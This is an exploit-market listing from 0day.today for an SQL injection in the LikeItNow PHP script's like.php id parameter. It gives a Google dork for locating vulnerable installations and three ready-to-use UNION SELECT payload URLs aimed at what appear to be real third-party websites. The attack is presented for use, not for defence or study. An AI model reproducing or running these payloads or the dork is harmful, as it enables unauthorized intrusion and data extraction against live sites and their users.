[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LikeItNow Script SQL Injection Vulnerability

Author
xStarCode
Risk
[
Security Risk High
]
0day-ID
0day-ID-19757
Category
web applications
Date add
17-11-2012
Platform
php
# Exploit Title: LikeItNow fb like (like.php, id parameter) SQL Injection
# Date: 17.11.2012
# Author: xStarCode
# Exploit Author: xStarCode
# Version: 1.0
# Category: webapps
# Google Dork: intitle:"LikeItNow - What do you like?"
# Tested on: Linux
# Demo site:

http://cinemaidea.com/like/like.php?id=-1+UNION+SELECT+1,version(),3--
http://www.wildercs.net/fb/like.php?id=-1+UNION+SELECT+1,version(),3--
http://mauricio.comule.com/like.php?id=-1+UNION+SELECT+1,version(),3--
# Vulnerable Parameters: id
#Exploit: www.example.com/like.php?id=[SQL Injection]
#
Author Mail: xstarcode@vpn.st
Author Website: www.xstarcode.wordpress.com
Xo xStarCode
#

#  0day.today [2024-09-21]  #